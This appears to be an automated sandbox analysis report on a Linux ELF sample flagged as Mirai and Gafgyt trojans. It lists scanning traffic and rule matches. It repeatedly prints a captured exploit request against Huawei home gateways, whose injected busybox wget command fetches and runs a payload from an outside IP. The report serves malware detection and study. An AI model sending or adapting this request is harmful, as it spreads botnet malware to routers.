                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
                Source: unknownTCP traffic detected without corresponding DNS query: 156.47.96.254
                Source: unknownTCP traffic detected without corresponding DNS query: 41.60.152.249
                Source: unknownTCP traffic detected without corresponding DNS query: 41.245.235.255
                Source: unknownTCP traffic detected without corresponding DNS query: 41.131.181.63
                Source: unknownTCP traffic detected without corresponding DNS query: 41.78.102.254
                Source: unknownTCP traffic detected without corresponding DNS query: 156.224.103.158
                Source: unknownTCP traffic detected without corresponding DNS query: 41.211.225.173
                Source: unknownTCP traffic detected without corresponding DNS query: 197.207.188.68
                Source: unknownTCP traffic detected without corresponding DNS query: 41.187.63.243
                Source: unknownTCP traffic detected without corresponding DNS query: 41.96.243.63
                Source: unknownTCP traffic detected without corresponding DNS query: 197.156.162.157
                Source: unknownTCP traffic detected without corresponding DNS query: 41.203.38.182
                Source: unknownTCP traffic detected without corresponding DNS query: 197.30.81.14
                Source: unknownTCP traffic detected without corresponding DNS query: 197.145.0.42
                Source: unknownTCP traffic detected without corresponding DNS query: 156.67.95.193
                Source: unknownTCP traffic detected without corresponding DNS query: 41.182.182.25
                Source: unknownTCP traffic detected without corresponding DNS query: 197.115.91.80
                Source: unknownTCP traffic detected without corresponding DNS query: 156.149.180.35
                Source: unknownTCP traffic detected without corresponding DNS query: 41.85.57.174
                Source: unknownTCP traffic detected without corresponding DNS query: 41.229.152.150
                Source: unknownTCP traffic detected without corresponding DNS query: 41.146.247.111
                Source: unknownTCP traffic detected without corresponding DNS query: 41.20.102.108
                Source: unknownTCP traffic detected without corresponding DNS query: 156.81.56.92
                Source: unknownTCP traffic detected without corresponding DNS query: 197.92.82.210
                Source: unknownTCP traffic detected without corresponding DNS query: 41.68.188.191
                Source: unknownTCP traffic detected without corresponding DNS query: 156.97.90.225
                Source: unknownTCP traffic detected without corresponding DNS query: 41.172.240.153
                Source: unknownTCP traffic detected without corresponding DNS query: 41.174.190.39
                Source: unknownTCP traffic detected without corresponding DNS query: 41.38.84.36
                Source: unknownTCP traffic detected without corresponding DNS query: 197.82.207.29
                Source: unknownTCP traffic detected without corresponding DNS query: 156.188.227.67
                Source: unknownTCP traffic detected without corresponding DNS query: 197.12.163.24
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.220.242
                Source: unknownTCP traffic detected without corresponding DNS query: 41.198.161.145
                Source: unknownTCP traffic detected without corresponding DNS query: 41.17.142.44
                Source: unknownTCP traffic detected without corresponding DNS query: 156.36.89.39
                Source: unknownTCP traffic detected without corresponding DNS query: 41.145.71.139
                Source: unknownTCP traffic detected without corresponding DNS query: 41.156.92.120
                Source: unknownTCP traffic detected without corresponding DNS query: 41.161.125.211
                Source: unknownTCP traffic detected without corresponding DNS query: 41.83.153.150
                Source: unknownTCP traffic detected without corresponding DNS query: 197.45.165.234
                Source: unknownTCP traffic detected without corresponding DNS query: 197.224.78.64
                Source: unknownTCP traffic detected without corresponding DNS query: 156.44.219.206
                Source: unknownTCP traffic detected without corresponding DNS query: 156.70.90.47
                Source: unknownTCP traffic detected without corresponding DNS query: 41.21.0.89
                Source: unknownTCP traffic detected without corresponding DNS query: 41.17.37.241
                Source: unknownTCP traffic detected without corresponding DNS query: 197.172.100.117
                Source: unknownTCP traffic detected without corresponding DNS query: 197.143.65.56
                Source: unknownTCP traffic detected without corresponding DNS query: 41.103.250.3
                Source: unknownTCP traffic detected without corresponding DNS query: 197.33.230.71
                Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: hj3msRLZgi.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: hj3msRLZgi.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

                System Summary

                barindex
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
